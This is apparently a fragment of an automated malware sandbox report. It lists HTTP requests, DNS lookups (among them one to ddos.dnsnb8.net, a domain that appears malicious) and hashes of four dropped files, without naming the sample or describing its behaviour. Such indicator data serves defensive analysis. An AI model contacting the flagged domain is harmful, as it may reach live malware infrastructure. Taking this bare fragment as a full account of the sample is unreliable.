GET https://tse1.mm.bing.net/th?id=OADD2.10239354941507_1IKXGMO7QA3RV5DUV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
HTTP Request
GET https://tse1.mm.bing.net/th?id=OADD2.10239400980050_1PW8OVEXHJX99CZMV&pid=21.2&c=3&w=1080&h=1920&dynsize=1&qlt=90
HTTP Response
200
HTTP Response
200
HTTP Response
200
HTTP Response
200
-
61 B 77 B 1 1
DNS Request
ddos.dnsnb8.net
DNS Response
44.221.84.105
-
66 B 90 B 1 1
DNS Request
8.8.8.8.in-addr.arpa
-
72 B 127 B 1 1
DNS Request
105.84.221.44.in-addr.arpa
-
73 B 159 B 1 1
DNS Request
131.160.190.20.in-addr.arpa
-
56 B 148 B 1 1
DNS Request
g.bing.com
DNS Response
150.171.27.10
150.171.28.10
-
72 B 158 B 1 1
DNS Request
10.27.171.150.in-addr.arpa
-
74 B 128 B 1 1
DNS Request
172.214.232.199.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
56.163.245.4.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
171.39.242.20.in-addr.arpa
-
71 B 157 B 1 1
DNS Request
55.36.223.20.in-addr.arpa
-
72 B 158 B 1 1
DNS Request
19.229.111.52.in-addr.arpa
-
62 B 170 B 1 1
DNS Request
tse1.mm.bing.net
DNS Response
150.171.27.10
150.171.28.10
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
4B
MD5: d3b07384d113edec49eaa6238ad5ff00
SHA1: f1d2d2f924e986ac86fdf7b36c94bcdf32beec15
SHA256: b5bb9d8014a0f9b1d61e21e796d78dccdf1352f23cd32812f4850b878ae4944c
SHA512: 0cf9180a764aba863a67b6d72f0918bc131c6772642cb2dce5a34f0a702f9470ddc2bf125c12198b1995c233c34b4afd346c54a2334c350a948a51b6e8b4e6b6
-
Filesize
4B
MD5: 20879c987e2f9a916e578386d499f629
SHA1: c7b33ddcc42361fdb847036fc07e880b81935d5d
SHA256: 9f2981a7cc4d40a2a409dc895de64253acd819d7c0011c8e80b86fe899464e31
SHA512: bcdde1625364dd6dd143b45bdcec8d59cf8982aff33790d390b839f3869e0e815684568b14b555a596d616252aeeaa98dac2e6e551c9095ea11a575ff25ff84f
-
Filesize
187B
MD5: 84c75f41c06fb84fb1e7fa400c7096e3
SHA1: 320d15ff5c74fce0255708f0667c449193fea773
SHA256: 749274650e83aad9e0c35ca97453f7404cb7e9fd9572b161c9637ca8e933ea2b
SHA512: 61fca78075597e2075cc194954a57474db6ef8911dbff3a0e230e8546fef038f0814b380d377d4bb7b59ca58e7f8450077301596902586380fcd5a535935f86c
-
Filesize
15KB
MD5: 56b2c3810dba2e939a8bb9fa36d3cf96
SHA1: 99ee31cd4b0d6a4b62779da36e0eeecdd80589fc
SHA256: 4354970ccc7cd6bb16318f132c34f6a1b3d5c2ea7ff53e1c9271905527f2db07
SHA512: 27812a9a034d7bd2ca73b337ae9e0b6dc79c38cfd1a2c6ac9d125d3cc8fa563c401a40d22155811d5054e5baa8cf8c8e7e03925f25fa856a9ba9dea708d15b4e